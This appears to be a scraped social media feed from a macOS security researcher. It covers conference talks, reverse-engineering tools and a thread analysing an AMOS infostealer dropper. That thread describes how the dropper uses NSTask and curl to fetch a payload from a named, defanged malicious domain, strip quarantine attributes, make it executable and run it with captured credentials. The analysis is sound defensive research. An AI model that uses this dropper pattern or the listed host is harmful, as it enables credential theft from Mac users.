L0Psec
@L0Psec
Followers
2K
Following
10K
Media
219
Statuses
2K
Father | macOS Security Researcher | RE | arm64 | InfoSec
NC
Joined October 2017
New RE Video:. In this video, I reverse engineer a malicious SwiftUI dropper. Swift is fun to RE so I thought it would be a good idea :) .Shout out to @txhaflaire for their recent blog post that covers this malware.
1
21
89
Appreciate the share as always @moonlock_lab! I feel it has been a while since we've seen such a readable Infostealer dropper. Unencrypted string commands passed to system() 4x and curl download output piped to osascript.
1/7: Our fellow researcher @g0njxa shared juicy info with us: a real #ClickFix-style find! A fake "Installation Instructions" pop-up pushes users to run a malicious bash command via Terminal. We couldn’t resist checking it, and what we uncovered? A multi-stage #macOS #stealer 👇
0
6
20
Appreciate y’all. Thanks for having me as a speaker and being a cool place to hang out at! Got to meet a lot of incredible people there :).
That wraps up #MalwareVillage.@DEFCON 33! 🥳. Special thanks to all the organizers, sponsors, volunteers, speakers, workshoppers, collaborators, attendees, and everyone involved, for making this event absolutely legendary! 🤩. Thank you all! 🙏
1
3
23
Got to talk about Swift RE yesterday at @MalwareVillage #defcon33 which was awesome! Decided to record an RE video while at DEFCON for fun, check it out :).
0
7
37
Time for my @MalwareVillage Swift talk tomorrow changed to 3:50pm. Come check it out if you want to see some live macOS malware reversing :) #defcon33
3
5
26
Definitely helps make the decompilation look much prettier :).
One of the coolest new things in Binary Ninja 5.1? Pseudo Objective‑C. Huge shoutout to @bdash, who actually wrote this before joining the team (talk about an overkill job application). If you’re digging into iOS, Swift, or kernelcaches, this one’s a game‑changer.
0
0
14
This will result in the update Mach-O being executed with the credentials captured. There is even an error message if it were to fail :)
0
1
1
There is a closure that is also observed related to the use of osascript which we saw in the first screenshot. Uses the same swift function to grab the path to osascript from 0x100031520 as a Swift object. This is then used to set up another NSTask
1
1
1
This command and a path to bash are both setup and passed as arguments to the NSTask object through the use of bridging functions to convert Swift objects into NSObjects.
1
1
1
Taking a look at the first address: 0x100031450, we can see the command that will be executed which results in the download to /tmp, clears extended attributes, and sets execute permissions.
1
1
1
The AppDelegate class has a method appropriately named runHiddenUpdateScript() which sets up the NSTask object. Before we get into the NSTask setup, we can see the use of swift_initStaticObject() which references addresses of strings used by NSTask.
1
1
2
This app leverages NSTask for downloading/executing the Infostealer Mach-O. Uses curl to connect to hxxps[:]//specter-storage[.]com/git/update (which already has a couple detections) and downloads the Mach-O named "update". Let's look at how it does this.
2
1
2
Another Swift Dropper for AMOS/AMOS-like variant found by the team:.84bc9007228073f4d73f4e6f7a05f920cd9317033d67d4c0cd375bbb95f13c70. 0 detections on VT since 5/29/25. Let's take a look some of its behavior🧵
1
20
60
RT @motuariki_: macOS malware: Amos Stealer variants have been busy. Here are some malicious domains being used to spread them. Hashes conn….
0
14
0
Trip to London last week for @objective_see #OFTW. Taught an arm64 class and did a macOS malware reversing demo. Got to see/meet a lot of cool people! Thanks to @andyrozen and @patrickwardle as always. Shoutout to @vector35 for providing binja licenses to students :)
1
8
44
RT @theevilbit: 🍎🐛macos 15.6 is out, a few new CVEs and mentions. NetAuth.Impact: An app may be able to break out of its sandbox.CVE-202….
0
7
0